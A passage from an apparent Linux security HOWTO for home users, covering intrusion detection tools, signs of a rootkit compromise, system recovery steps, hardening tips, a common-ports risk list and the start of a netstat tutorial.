using a 2.4 kernel, use iptables. Then, ipchains if using a 2.2 kernel. The
long answer is "it just depends on what you are doing and what the objective
is". Sorry. The other tools all have some merit in any given situation, and
all can be effective in the right situation.

"Do I really need all these packages?" No, but please combine more than one
approach, and please follow all the above recommendations. iptables by itself
is good, but in conjunction with some of the other approaches, we are even
stronger. Do not rely on any single mechanism to provide a security blanket.
"Layers" of protection is always best. As is sound administrative practices.
The best iptables script in the world is but one piece of the puzzle, and
should not be used to hide other system weaknesses.

"If I have a small home LAN, do I need to have a firewall on each computer?"
No, not necessary as long as the LAN gateway has a properly configured
firewall. Unwanted traffic should be stopped at that point. And as long as
this is working as intended, there should be no unwanted traffic on the LAN.
But, by the same token, doing this certainly does no harm. And on larger LANs
that might be mixed platform, or with untrusted users, it would be advisable.
-----------------------------------------------------------------------------

6. Intrusion Detection

This section will deal with how to get early warning, how to be alerted after
the fact, and how to clean up from intrusion attempts.
-----------------------------------------------------------------------------

6.1. Intrusion Detection Systems (IDS)

Intrusion Detection Systems (IDS for short) are designed to catch what might
have gotten past the firewall. They can either be designed to catch an active
break-in attempt in progress, or to detect a successful break-in after the
fact. In the latter case, it is too late to prevent any damage, but at least
we have early awareness of a problem. There are two basic types of IDS: those
protecting networks, and those protecting individual hosts.

For host based IDS, this is done with utilities that monitor the filesystem
for changes. System files that have changed in some way, but should not
change -- unless we did it -- are a dead give away that something is amiss.
Anyone who gets in, and gets root, will presumably make changes to the system
somewhere. This is usually the very first thing done. Either so he can get
back in through a backdoor, or to launch an attack against someone else. In
which case, he has to change or add files to the system.

This is where tools like tripwire ([http://www.tripwire.org] http://
www.tripwire.org) play a role. Tripwire is included beginning with Red Hat
7.0. Such tools monitor various aspects of the filesystem, and compare them
against a stored database. And can be configured to send an alert if any
changes are detected. Such tools should only be installed on a known "clean"
system.

For home desktops and home LANs, this is probably not an absolutely necessary
component of an overall security strategy. But it does give peace of mind,
and certainly does have its place. So as to priorities, make sure the Steps
1, 2 and 3 above are implemented and verified to be sound, before delving
into this.

We can get somewhat the same results with rpm -Va, which will verify all
packages, but without all the same functionality. For instance, it will not
notice new files added to most directories. Nor will it detect files that
have had the extended attributes changed (e.g. chattr +i, man chattr and man
lsattr). For this to be helpful, it needs to be done after a clean install,
and then each time any packages are upgraded or added. Example:

+---------------------------------------------------------------------------+
|                                                                           |
| # rpm -Va > /root/system.checked                                          |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Then we have a stored system snapshot that we can refer back to.

Another idea is to run chkrootkit ([http://www.chkrootkit.org/] http://
www.chkrootkit.org/) as a weekly cron job. This will detect common "rootkits"
.
-----------------------------------------------------------------------------

6.2. Have I Been Hacked?

Maybe you are reading this because you've noticed something "odd" about your
system, and are suspicious that someone was gotten in? This can be a clue.

The first thing an intruder typically does is install a "rootkit". There are
many prepackaged rootkits available on the Internet. The rootkit is
essentially a script, or set of scripts, that makes quick work of modifying
the system so the intruder is in control, and he is well hidden. He does this
by installing modified binaries of common system utilities and tampering with
log files. Or by using special kernel modules that achieve similar results.
So common commands like ls may be modified so as to not show where he has his
files stored. Clever!

A well designed rootkit can be quite effective. Nothing on the system can
really be trusted to provide accurate feedback. Nothing! But sometimes the
modifications are not as smooth as intended and give hints that something is
not right. Some things that might be warning signs:

<A0><A0>*<2A>Login acts weird. Maybe no one can login. Or only root can login. Any
    login weirdness at all should be suspicious. Similarly, any weirdness
    with adding or changing passwords.

    Wierdness with other system commands (e.g. top or ps) should be cause for
    concern as well.

<A0><A0>*<2A>System utilities are slower, or awkward, or show strange and unexpected
    results. Common utilities that might be modified are: ls, find, who, w,
    last, netstat, login, ps, top. This is not a definitive list!

<A0><A0>*<2A>Files or directories named "..." or ".. " (dot dot space). A sure bet in
    this case. Files with haxor looking names like "r00t-something".

<A0><A0>*<2A>Unexplained bandwidth usage, or connections. Script kiddies have a
    fondness for IRC, so such connections should raise a red flag.

<A0><A0>*<2A>Logs that are missing completely, or missing large sections. Or a sudden
    change in syslog behavior.

<A0><A0>*<2A>Mysterious open ports, or processes.

<A0><A0>*<2A>Files that cannot be deleted or moved. Some rootkits use chattr to make
    files "immutable", or not changable. This kind of change will not show up
    with ls, or rpm -V, so the files look normal at first glance. See the man
    pages for chattr and lsattr on how to reverse this. Then see the next
    section below on restoring your system as the jig is up at this point.

    This is becoming a more and more common script kiddie trick. In fact, one
    quick test to run on a suspected system (as root):
    +---------------------------------------------------------------+
    |  /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep i--         |
    |                                                               |
    +---------------------------------------------------------------+

    This will look for any "immutable" files in root's PATH, which is almost
    surely a sign of trouble since no standard distributions ship files in
    this state. If the above command turns up anything at all, then plan on
    completely restoring the system (see below). A quick sanity check:
    +---------------------------------------------------------------+
    |  # chattr +i /bin/ps                                          |
    |  # /usr/bin/lsattr `echo $PATH | tr ':' ' '` | grep "i--"     |
    |    ---i---------- /bin/ps                                     |
    |  # chattr -i /bin/ps                                          |
    |                                                               |
    +---------------------------------------------------------------+

    This is just to verify the system is not tampered with to the point that
    lsattr is completely unreliable. The third line is exactly what you
    should see.

<A0><A0>*<2A>Indications of a "sniffer", such as log messages of an interface entering
    "promiscuous" mode.

<A0><A0>*<2A>Modifications to /etc/inetd.conf, rc.local, rc.sysint or /etc/passwd.
    Especially, any additions. Try using cat or tail to view these files.
    Additions will most likely be appended to the end. Remember though such
    changes may not be "visible" to any system tools.


Sometimes the intruder is not so smart and forgets about root's
.bash_history, or cleaning up log entries, or even leaves strange, leftover
files in /tmp. So these should always be checked too. Just don't necessarily
expect them to be accurate. Often such left behind files, or log entries,
will have obvious script kiddie sounding names, e.g. "r00t.sh".

Packet sniffers, like tcpdump ([http://www.tcpdump.org] http://
www.tcpdump.org), might be useful in finding any uninvited traffic.
Interpreting sniffer output is probably beyond the grasp of the average new
user. snort ([http://www.snort.org] http://www.snort.org), and ethereal
([http://www.ethereal.com] http://www.ethereal.com), are also good. Ethereal
has a GUI.

As mentioned, a compromised system will undoubtedly have altered system
binaries, and the output of system utilities is not to be trusted. Nothing on
the system can be relied upon to be telling you the whole truth.
Re-installing individual packages may or may not help since it could be
system libraries or kernel modules that are doing the dirty work. The point
here is that there is no way to know with absolute certainty exactly what
components have been altered.

We can use rpm -Va |less to attempt to verify the integrity all packages. But
again there is no assurance that rpm itself has not been tampered with, or
the system components that RPM relies on.

If you have pstree on your system, try this instead of the standard ps.
Sometimes the script kiddies forget about this one. No guarantees though that
this is accurate either.

You can also try querying the /proc filesystem, which contains everything the
kernel knows about processes that are running:

+---------------------------------------------------------------------------+
|                                                                           |
| # cat /proc/*/stat | awk '{print $1,$2}'                                  |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

This will provide a list of all processes and PID numbers (assuming a
malicious kernel module is not hiding this).

Another approach is to visit [http://www.chkrootkit.org] http://
www.chkrootkit.org, download their rootkit checker, and see what it says.

Some interesting discussions on issues surrounding forensics can be found at
[http://www.fish.com/security/] http://www.fish.com/security/. There is also
a collection of tools available, aptly called "The Coroner's Toolkit" (TCT).

Read below for steps on recovering from an intrusion.
-----------------------------------------------------------------------------

6.3. Reclaiming a Compromised System

So now you've confirmed a break-in, and know that someone else has root
access, and quite likely one or more hidden backdoors to your system. You've
lost control. How to clean up and regain control?

There is no sure fire way of doing this short of a complete re-install. There
is no way to find with assurance all the modified files and backdoors that
may have been left. Trying to patch up a compromised system risks a false
sense of security and may actually aggravate an already bad situation.

The steps to take, in this order:

<A0><A0>*<2A>Pull the plug and disconnect the machine. You may be unwittingly
    participating in criminal activity, and doing to others what has been
    done to you.

<A0><A0>*<2A>Depending on the needs of the situation and time available to restore the
    system, it is advantageous to learn as much as you can about how the
    attacker got in, and what was done in order to plug the hole and avoid a
    recurrence. This could conceivably be time consuming, and is not always
    feasible. And it may require more expertise than the typical user
    possesses.

<A0><A0>*<2A>Backup important data. Do not include any system files in the backup, and
    system configuration files like inetd.conf. Limit the backup to personal
    data files only! You don't want to backup, then restore something that
    might open a backdoor or other hole.

<A0><A0>*<2A>Re-install from scratch, and reformat the drive during the installation (
    mke2fs) to make sure no remnants are hiding. Actually, replacing the
    drive is not a bad idea. Especially, if you want to keep the compromised
    data available for further analysis.

<A0><A0>*<2A>Restore from backups. After a clean install is the best time to install
    an IDS (Intrusion Detection System) such as tripwire ([http://
    www.tripwire.org] http://www.tripewire.org).

<A0><A0>*<2A>Apply all updates from [ftp://updates.redhat.com] ftp://
    updates.redhat.com.

<A0><A0>*<2A>Re-examine your system for unnecessary services. Re-examine your firewall
    and access policies, and tighten all holes. Use new passwords, as these
    were stolen in all likelihood.

<A0><A0>*<2A>Re-connect system ;-)


At this time, any rootkit cleanup tools that may be available on-line are not
recommended. They probably do work just fine most of the time. But again, how
to be absolutely sure that all is well and all vestiges of the intrusion are
gone?
-----------------------------------------------------------------------------

7. General Tips

This section will quickly address some general concepts for maintaining a
more secure and reliable system or network. Let's emphasize "maintaining"
here since computer systems change daily, as does the environment around
them. As mentioned before, there isn't any one thing that makes a system
secure. There are too many variables. Security is an approach and an attitude
more than it is a reliance on any particular product, application or specific
policy.

<A0><A0>*<2A>Do not allow remote root logins. This may be controlled by a
    configuration file such as /etc/securetty. Remove any lines that begin
    "pts". This is one big security hole.

<A0><A0>*<2A>In fact, don't log in as root at all. Period. Log in on your user account
    and su to root when needed. Whether the login is remote or local. Or use
    sudo, which can run individual commands with root privileges. (Red hat
    includes a sudo package. ) This takes some getting used to, but it is the
    "right" way to do things. And the safest. And will become more a more
    natural way of doing this as time goes on.

    I know someone is saying right now "but that is so much trouble, I am
    root, and it is my system". True, but root is a specialized account that
    was not ever meant to be used as a regular user account. Root has access
    to everything, even hardware devices. The system "trusts" root. It
    believes that you know what you are doing. If you make a mistook, it
    assumes that you meant that, and will do it's best to do what you told it
    to do...even if that destroys the system!

    As an example, let's say you start X as root, open Netscape, and visit a
    web site. The web page has badly behaved java script. And conceivably now
    that badly written java script might have access to much more of your
    system than if you had done it the "right" way.

<A0><A0>*<2A>Take passwords seriously. Don't give them out to anyone. Don't use the
    same one for everything. Don't use root's password for anything else --
    except root's password! Never sign up or register on line, using any of
    your system passwords. Passwords should be a combination of mixed case
    letters, numbers and/or punctuation and a reasonable length (eight
    characters or longer). Don't use so-called "dictionary" words that are
    easy to guess like "cat" or "dog". Don't incorporate personal information
    like names or dates or hostnames. Don't write down system passwords --
    memorize them.

    Use the more secure "shadow" passwords. This has been the default on Red
    Hat for some time now. If the file /etc/shadow exists, then it is enabled
    already. The commands pwconv and grpconv, can be used to convert password
    and group files to shadow format if available.

<A0><A0>*<2A>Avoid using programs that require clear text logins over untrusted
    networks like the Internet. Telnet is a prime example. ssh is much
    better. If there is any support for SSL (Secure Socket Layers), use it.
    For instance, does your ISP offer POP or IMAP mail via SSL? Recent Red
    Hat releases do include [http://www.openssl.org/] openssl, and many Linux
    applications can use SSL where support is available.

<A0><A0>*<2A>Set resource limits. There are various ways to do this. The need for this
    probably increases with the number of users accessing a given system. Not
    only does setting limits on such things as disk space prevent intentional
    mischief, it can also help with unintentionally misbehaved applications
    or processes. quota (man quota) can be used to set disk space limits.
    Bash includes the ulimit command (man ulimit or man bash), that can limit
    various functions on a per user basis.

    Also, not discussed here at any length, but PAM (Pluggable Authentication
    Modules) has a very sophisticated approach to controlling various system
    functions and resources. See man pam to get started. PAM is configured
    via either /etc/pam.conf or /etc/pam.d/*. Also files in /etc/security/*,
    including /etc/security/limits.conf, where again various sane limits can
    be imposed. An in depth look at PAM is beyond the scope of this document.
    The User-Authentication HOWTO ([http://tldp.org/HOWTO/
    User-Authentication-HOWTO/index.html] http://tldp.org/HOWTO/
    User-Authentication-HOWTO/index.html) has more on this.

<A0><A0>*<2A>Make sure someone with a clue is getting root's mail. This can be done
    with an "alias". Typically, the mail server will have a file such as /etc
    /aliases where this can defined. This can conceivably be an account on
    another machine if need be:

    +---------------------------------------------------------------+
    |                                                               |
    | # Person who should get root's mail.  This alias              |
    | # must exist.                                                 |
    | # CHANGE THIS LINE to an account of a HUMAN                   |
    | root:           hal@bigcat                                    |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    Remember to run newaliases (or equivalent) afterward.

<A0><A0>*<2A>Be careful where you get software. Use trusted sources. How well do you
    trust complete strangers? Check Red Hat's ftp site (or mirrors) first if
    looking for a specific package. It will probably be best suited for your
    system any way. Or, the original package's project site is good as well.
    Installing from raw source (either tarball or src.rpm) at least gives you
    the ability to examine the code. Even if you don't understand it ;-)
    While this does not seem to be a wide spread problem with Linux software
    sites, it is very trivial for someone to add a very few lines of code,
    turning that harmless looking binary into a "Trojan horse" that opens a
    backdoor to your system. Then the jig is up.

<A0><A0>*<2A>So someone has scanned you, probed you, or otherwise seems to want into
    your system? Don't retaliate. There is a good chance that the source IP
    address is a compromised system, and the owner is a victim already. Also,
    you may be violating someone's Terms of Service, and have trouble with
    your own ISP. The best you can do is to send your logs to the abuse
    department of the source IP's ISP, or owner. This is often something like
    "abuse@someisp.com". Just don't expect to hear much back. Generally
    speaking, such activity is not legally criminal, unless an actual
    break-in has taken place. Furthermore, even if criminal, it will never be
    prosecuted unless significant damage (read: big dollars) can be shown.

<A0><A0>*<2A>Red Hat users can install the "Bastille Hardening System", [http://
    www.bastille-linux.org/] http://www.bastille-linux.org/. This is a
    multi-purpose system for "hardening" Red Hat and Mandrake system
    security. It has a GUI interface which can be used to construct firewall
    scripts from scratch and configure PAM among many other things. Debian
    support is new.

<A0><A0>*<2A>So you have a full-time Internet connection via cable-modem or DSL. But
    do you always use it, or always need it? There's an old saying that "the
    only truly secure system, is a disconnected system". Well, that's
    certainly one option. So take that interface down, or stop the
    controlling daemon (dhcpcd, pppoed, etc). Or possibly even set up cron
    jobs to bring your connection up and down according to your normal
    schedule and usage.

<A0><A0>*<2A>What about cable and DSL routers that are often promoted as "firewalls"?
    The lower priced units are mostly equating NAT (Network Address
    Translation), together with the ability to open holes for ports through
    it, as a firewall. While NAT itself does provide a fair degree of
    security for the systems behind the NAT gateway, this does not constitute
    anything but a very rudimentary firewall. And if holes are opened, there
    is still exposure. Also, you are relying on the router's firmware and
    implementation not to be flawed. It is wise to have some kind of
    additional protection behind such routers.

<A0><A0>*<2A>What about wireless network cards and hubs? Insecure, despite what the
    manufacturers may claim. Treat these connections just as you would an
    Internet connection. Use secure protocols like ssh only! Even if it is
    just one LAN box to another.

<A0><A0>*<2A>If you find you need to run a particular service, and it is for just you,
    or maybe a relatively small number of people, use a non-standard port.
    Most server daemons support this. For instance, sshd runs on port 22 by
    default. All worms and script kiddies will expect it there, and look for
    it there. So, run it on another port! See the sshd man page.

<A0><A0>*<2A>What about firewalls that block Internet connections according to the
    application (like ZoneAlarm from Windowsdom)? These were designed with
    this feature primarily because of the plethora of virii and trojans that
    are so common with MS operating systems. This is really not a problem on
    Linux. So, really no such application exists on Linux at this time. And
    there does not seem to be enough demand for it that someone has taken the
    time to implement it. A better firewall can be had on Linux, by following
    the other suggestions in this document.

<A0><A0>*<2A>Lastly, know your system! Let's face it, if you are new to Linux, you
    can't already know something you have never used. Understood. But in the
    process of learning, learn how to do things the right way, not the
    easiest way. There is several decades of history behind "the right way"
    of doing things. This has stood the test of time. What may seem
    unnecessary or burdensome now, will make sense in due time.

    Be familiar with whatever services you are running, and the implications
    these services might have to the overall health of your system if
    something does go wrong. Read what you can, and ask questions. Don't run
    something as a service "just because I can", or because the installer put
    it there. You can't start out being an experienced System Administrator
    clearly. But you can work to learn enough about your own system, that you
    are in control. This is one thing that separates *nix from MS systems: we
    can never be in complete control with MS, but we can with *nix.
    Conversely, if something bad happens, we often have no one else to blame.


-----------------------------------------------------------------------------
8. Appendix

8.1. Servers, Ports, and Packets

Let's take a quick, non-technical look at some networking concepts, and how
they can potentially impact our own security. We don't need to know much
about networking, but a general idea of how things work is certainly going to
help us with firewalls and other related issues.

As you may have noticed Linux is a very network oriented Operating System.
Much is done by connecting to "servers" of one type or another -- X servers,
font servers, print servers, etc.

Servers provide "services", which provide various capabilities, both to the
local system and potentially other remote systems. The same server generally
provides both functionalities. Some servers work quietly behind the scenes,
and others are more interactive by nature. We may only be aware of a print
server when we need to print something, but it is there running, listening,
and waiting for connection requests whether we ever use it or not (assuming
of course we have it enabled). A typical Linux installation will have many,
many types of servers available to it. Default installations often will turn
some of these "on".

And even if we are not connected to a real network all the time, we are still
"networked" so to speak. Take our friendly local X server for instance. We
may tend to think of this as just providing a GUI interface, which is only
true to a point. It does this by "serving" to client applications, and thus
is truly a server. But X Windows is also capable of serving remote clients
over a network -- even large networks like the Internet. Though we probably
don't really want to be doing this ;-)

And yes, if you are not running a firewall or have not taken other
precautions, and are connected to the Internet, it is quite possible that
someone -- anyone -- could connect to your X server. X11 "listens" on TCP
"port" 6000 by default. This principle applies to most other servers as well
-- they can be easily connected to, unless something is done to restrict or
prevent connections.

In TCP/IP (Transmission Control Protocol/Internet Protocol) networks like we
are talking about with Linux and the Internet, every connected computer has a
unique "IP Address". Think of this like a phone number. You have a phone
number, and in order to call someone else, you have to know that phone
number, and then dial it. The phone numbers have to be unique for the system
to work. IP address are generally expressed as "dotted quad" notation, e.g.
152.19.254.81.

On this type of network, servers are said to "listen". This means that they
have a "port" opened, and are awaiting incoming connections to that port.
Connections may be local, as is typically the case with our X server, or
remote -- meaning from another computer "somewhere". So servers "listen" on a
specific "port" for incoming connections. Most servers have a default port,
such as port 80 for web servers. Or 6000 for X11. See /etc/services for a
list of common ports and their associated service.

The "port" is actually just an address in the kernel's networking stack, and
is a method that TCP, and other protocols, use to organize connections and
the exchange of data between computers. There are total of 65,536 TCP and UDP
ports available, though usually only a relatively few of these are used at
any one time. These are classified as "privileged", those ports below 1024,
and "unprivileged", 1024 and above. Most servers use the privileged ports.

Only one server may listen on, or "bind" to, a port at a time. Though that
server may well be able to open multiple connections via that one port.
Computers talk to each other via these "port" connections. One computer will
open a connection to a "port" on another computer, and thus be able to
exchange data via the connection that has been established between their
respective ports.

Getting back to the phone analogy, and stretching it a bit, think of calling
a large organization with a complex phone system. The organization has many
"departments": sales, shipping, billing, receiving, customer service, R&D,
etc. Each department has it's own "extension" number. So the shipping
department might be extension 21, the sales might be department 80 and so on.
The main phone number is the IP Address, and the department's extension is
the port in this analogy. The "department's" number is always the same when
we call. And generally they can handle many simultaneous incoming calls.

The data itself is contained in "packets", which are small chunks of data,
generally 1500 bytes or less each. Packets are used to control and organize
the connection, as well as carry data. There are different types of packets.
Some are specifically used for controlling the connection, and then some
packets carry our data as their payload. If there is a lot of data, it will
be broken up into multiple packets which is almost always how it works. The
packets will be transmitted one at a time, and then "re-assembled" at the
other end. One web page for instance, will take many packets to transmit --
maybe hundreds or even thousands. This all happens very quickly and
transparently.

We can see a typical connection between two computers in this one line
excerpt from netstat output:

+---------------------------------------------------------------------------+
| tcp    30    0 169.254.179.139:1359    18.29.1.67:21      CLOSE_WAIT      |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The interesting part is the IP addresses and ports in the fourth and fifth
columns. The port is the number just to the right of the colon. The left side
of the colon is the IP address of each computer. The fourth column is the
local address, or our end of the connection. In the example, 169.254.179.139
is the IP address assigned by my ISP. It is connected to port 21 (FTP) on
18.29.1.67, which is rpmfind.net. This is just after an FTP download from
rpmfind.net. Note that while I am connected to their FTP server on their port
21, the port on my end that is used by my FTP client is 1359. This is a
randomly assigned "unprivileged" port, used for my end of the two-way
"conversation". The data moves in both directions: me:port#1359 <-> them:port
#21. The FTP protocol is actually a little more complicated than this, but we
won't delve into the finer points here. The CLOSE_WAIT is the TCP state of
the connection at this particular point in time. Eventually the connection
will close completely on both ends, and netstat will not show anything for
this.

The "unprivileged" port that is used for my end of the connection, is
temporary and is not associated with a locally running server. It will be
closed by the kernel when the connection is terminated. This is quite
different than the ports that are kept open by "listening" servers, which are
permanent and remain "open" even after a remote connection is terminated.

So to summarize using the above example, we have client (me) connecting to a
server (rpmfind.net), and the connection is defined and controlled by the
respective ports on either end. The data is transmitted and controlled by
packets. The server is using a "privileged" port (i.e. a port below number
1024) which stays open listening for connections. The "unprivileged" port
used on my end by my client application is temporary, is only opened for the
duration of the connection, and only responds to the server's port at the
other end of the connection. This type of port is not vulnerable to attacks
or break-ins generally speaking. The server's port is vulnerable since it
remains open. The administrator of the FTP server will need to take
appropriate precautions that his server is secure. Other Internet
connections, such as to web servers or mail servers, work similar to the
above example, though the server ports are different. SMTP mail servers use
port 25, and web servers typically use port 80. See the Ports section for
other commonly used ports and services.

One more point on ports: ports are only accessible if there is something
listening on that port. No one can force a port open if there is no service
or daemon listening there, ready to handle incoming connection requests. A
closed port is a totally safe port.

And a final point on the distinction between clients and servers. The example
above did not have a telnet or ftp server in the LISTENER section in the
netstat example above. In other words, no such servers were running locally.
You do not need to run a telnet or ftp server daemon in order to connect to
somebody else's telnet or ftp server. These are only for providing these
services to others that would be making connections to you. Which you don't
really want to be doing in most cases. This in no way effects the ability to
use telnet and ftp client software.
-----------------------------------------------------------------------------

8.2. Common Ports

A quick run down of some commonly seen and used ports, with the commonly
associated service name, and risk factor. All have some risk. It is just that
some have historically had more exploits than others. That is how they are
evaluated below, and not necessarily to be interpreted as whether any given
service is safe or not.

1-19, assorted protocols, many of which are antiquated, and probably none of
which are needed on a modern system. If you don't know what any of these are,
then you definitely don't need them. The echo service (port 7) should not be
confused with the common ping program. Leave all these off.

20 - FTP-DATA. "Active" FTP connections use two ports: 21 is the control
port, and 20 is where the data comes through. Passive FTP does not use port
20 at all. Low risk, but see below.

21 - FTP server port, aka File Transfer Protocol. A well entrenched protocol
for transferring files between systems. Very high risk, and maybe the number
one crack target.

22 - SSH (Secure Shell), or sometimes PCAnywhere. Low to moderate risk (yes
there are exploits even against so called "secure" services).

23 - Telnet server. For LAN use only. Use ssh instead in non-secure
environments. Moderate risk.

25 - SMTP, Simple Mail Transfer Protocol, or mail server port, used for
sending outgoing mail, and transferring mail from one place to another.
Moderate risk. This has had a bad history of exploits, but has improved
lately.

37 - Time service. This is the built-in inetd time service. Low risk. For LAN
use only.

53 - DNS, or Domain Name Server port. Name servers listen on this port, and
answer queries for resolving host names to IP addresses. High Risk.

67 (UDP) - BOOTP, or DHCP, server port. Low risk. If using DHCP on your LAN,
this does not need to be exposed to the Internet.

68 (UDP) - BOOTP, or DHCP, client port. Low risk.

69 - tftp, or Trivial File Transfer Protocol. Extremely insecure. LAN only,
if really, really needed.

79 - Finger, used to provide information about the system, and logged in
users. Low risk as a crack target, but gives out way too much information and
should not be run.

80 - WWW or HTTP standard web server port. The most commonly used service on
the Internet. Low risk.

98 - Linuxconf web access administrative port. LAN only, if really needed at
all.

110 - POP3, aka Post Office Protocol, mail server port. POP mail is mail that
the user retrieves from a remote system. Low risk.

111 - sunrpc (Sun Remote Procedure Call), or portmapper port. Used by NFS
(Network File System), NIS (Network Information Service), and various related
services. Sounds dangerous and is high risk. LAN use only. A favorite crack
target.

113 - identd, or auth, server port. Used, and sometimes required, by some
older style services (like SMTP and IRC) to validate the connection. Probably
not needed in most cases. Low risk, but could give an attacker too much
information about your system.

119 -- nntp or news server port. Low risk.

123 - Network Time Protocol for synchronizing with time servers where a high
degree of accuracy is required. Low risk, but probably not required for most
users. rdate makes an easier and more secure way of updating the system
clock. And then inetd's built in time service for synchronizing LAN systems
is another option.

137-139 - NetBios (SMB) services. Mostly a Windows thing. Low risk on Linux,
but LAN use only. 137 is a very commonly seen port attempt. A rather
obnoxious protocol from Redmond that generates a lot of "noise", much of
which is harmless.

143 - IMAP, Interim Mail Access Protocol. Another mail retrieval protocol.
Low to moderate risk.

161 - SNMP, Simple Network Management Protocol. More commonly used in routers
and switches to monitor statistics and vital signs. Not needed for most of
us, and low risk.

177 - XDMCP, the X Display Management Control Protocol for remote connections
to X servers. Low risk, but LAN only is recommended.

443 - HTTPS, a secure HTTP (WWW) protocol in fairly wide use. Low risk.

465 - SMTP over SSL, secure mail server protocol. Low risk.

512 (TCP) - exec is how it shows in netstat. Actually the proper name is
rexec, for Remote Execution. Sounds dangerous, and is. High risk, LAN only if
at all.

512 (UDP) - biff, a mail notification protocol. Low risk, LAN only.

513 - login, actually rlogin, aka Remote Login. No relation to the standard /
bin/login that we use every time we log in. Sounds dangerous, and is. High
risk, and LAN only if really needed.

514 (TCP) - shell is the nickname, and how netstat shows it. Actually, rsh is
the application for "Remote Shell". Like all the "r" commands, this is a
throw back to kindler, gentler times. Very insecure, so high risk, and LAN
only usage, if at all.

514 (UDP) - syslog daemon port, only used for remote logging purposes. The
average user does not need this. Probably low risk, but definitely LAN only
if really required.

515 - lp or print server port. High risk, and LAN only of course. Someone on
the other side of the world does not want to use your printer for it's
intended purpose!

587 - MSA, or "submission", the Mail Submission Agent protocol. A new mail
handling protocol supported by most MTA's (mail servers). Low risk.

631 - the CUPS (print daemon) web management port. LAN only, low risk.

635 - mountd, part of NFS. LAN use only.

901 - SWAT, Samba Web Administration Tool port. LAN only.

993 - IMAP over SSL, secure IMAP mail service. Very low risk.

995 - POP over SSL, secure POP mail service. Very low risk.

1024 - This is the first "unprivileged" port, which is dynamically assigned
by the kernel to whatever application requests it. This can be almost
anything. Ditto for ports just above this.

1080 - Socks Proxy server. A favorite crack target.

1243 - SubSeven Trojan. Windows only problem.

1433 - MS SQL server port. A sometimes target. N/A on Linux.

2049 - nfsd, Network File Service Daemon port. High risk, and LAN usage only
is recommended.

3128 - Squid proxy server port. Low risk, but for most should be LAN only.

3306 - MySQL server port. Low risk, but for most should be LAN only.

5432 - PostgreSQL server port. LAN only, relatively low risk.

5631 (TCP), 5632 (UDP) - PCAnywhere ports. Windows only. PCAnywhere can be
quite "noisy", and broadcast wide address ranges.

6000 - X11 TCP port for remote connections. Low to moderate risk, but again,
this should be LAN only. Actually, this can include ports 6000-6009 since X
can support multiple displays and each display would have its own port. ssh's
X11Forwarding will start using ports at 6010.

6346 - gnutella.

6667 - ircd, Internet Relay Chat Daemon.

6699 - napster.

7100-7101 - Some font servers use these ports. Low risk, but LAN only.

8000 and 8080 - common web cache and proxy server ports. LAN only.

10000 - webmin, a web based system administration utility. Low risk at this
point.

27374 - SubSeven, a commonly probed for Windows only Trojan. Also, 1243.

31337 - Back Orifice, another commonly probed for Windows only Trojan.

More services and corresponding port numbers can be found in /etc/services.
Also, the "official" list is [http://www.iana.org/assignments/port-numbers]
http://www.iana.org/assignments/port-numbers.

A great analysis of what probes to these and other ports might mean from
Robert Graham: [http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html] http://www.linuxsecurity.com/resource_files/firewalls/
firewall-seen.html. A very good reference.

Another point here, these are the standard port designations. There is no law
that says any service has to run on a specific port. Usually they do, but
certainly they don't always have to.

Just a reminder that when you see these types of ports in your firewall logs,
it is not anything to go off the deep end about. Not if you have followed
Steps 1-3 above, and verified your firewall works. You are fairly safe. Much
of this traffic may be "stray bullets" too -- Internet background noise,
misconfigured clients or routers, noisy Windows stuff, etc.
-----------------------------------------------------------------------------

8.3. Netstat Tutorial

8.3.1. Overview

netstat is a very useful utility for viewing the current state of your
network status -- what servers are listening for incoming connections, what
interfaces they listen on, who is connected to us, who we are connect to, and
so on. Take a look at the man page for some of the many command line options.
We'll just use a relative few options here.

As an example, let's check all currently listening servers and active
connections for both TCP and UDP on our hypothetical host, bigcat. bigcat is
a home desktop installation, with a DSL Internet connection in this example.
bigcat has two ethernet cards: one for the external connection to the ISP,
and one for a small LAN with an address of 192.168.1.1.

+--------------------------------------------------------------------------------+
|                                                                                |
|$ netstat -tua                                                                  |
|Active Internet connections (servers and established)                           |
|Proto Recv-Q Send-Q Local Address           Foreign Address         State       |
|tcp        0      0 *:printer               *:*                     LISTEN      |
|tcp        0      0 bigcat:8000             *:*                     LISTEN      |
|tcp        0      0 *:time                  *:*                     LISTEN      |
|tcp        0      0 *:x11                   *:*                     LISTEN      |
|tcp        0      0 *:http                  *:*                     LISTEN      |
|tcp        0      0 bigcat:domain           *:*                     LISTEN      |
|tcp        0      0 bigcat:domain           *:*                     LISTEN      |
|tcp        0      0 *:ssh                   *:*                     LISTEN      |
|tcp        0      0 *:631                   *:*                     LISTEN      |
|tcp        0      0 *:smtp                  *:*                     LISTEN      |
|tcp        0      1 dsl-78-199-139.s:1174   64.152.100.93:nntp      SYN_SENT    |
|tcp        0      1 dsl-78-199-139.s:1175   64.152.100.93:nntp      SYN_SENT    |
|tcp        0      1 dsl-78-199-139.s:1173   64.152.100.93:nntp      SYN_SENT    |
|tcp        0      0 dsl-78-199-139.s:1172   207.153.203.114:http    ESTABLISHED |
|tcp        1      0 dsl-78-199-139.s:1199   www.xodiax.com:http     CLOSE_WAIT  |
|tcp        0      0 dsl-78-199-139.sd:http  63.236.92.144:34197     TIME_WAIT   |
|tcp      400      0 bigcat:1152             bigcat:8000             CLOSE_WAIT  |
|tcp     6648      0 bigcat:1162             bigcat:8000             CLOSE_WAIT  |
|tcp      553      0 bigcat:1164             bigcat:8000             CLOSE_WAIT  |
|udp        0      0 *:32768                 *:*                                 |
|udp        0      0 bigcat:domain           *:*                                 |
|udp        0      0 bigcat:domain           *:*                                 |
|udp        0      0 *:631                   *:*                                 |
|                                                                                |
|                                                                                |
+--------------------------------------------------------------------------------+

This output probably looks very different from what you get on your own
system. Notice the distinction between "Local Address" and "Foreign Address",
and how each includes a corresponding port number (or service name if
available) after the colon. "Local Address" is our end of the connection. The
first group with LISTEN in the far right hand column are services that are
running on this system. These are servers that are running in the background
on bigcat, and "listen" for incoming connections. So they have a port opened,
and this is where they "listen". These connections might come from the local
system (i.e. bigcat itself), or remote systems. This is very important
information to have! The others just below this are connections that have
been established from this system to other systems. The respective
connections are in varying states as indicated by the key words in the last
column. Those with no key word in the last column at the end are servers
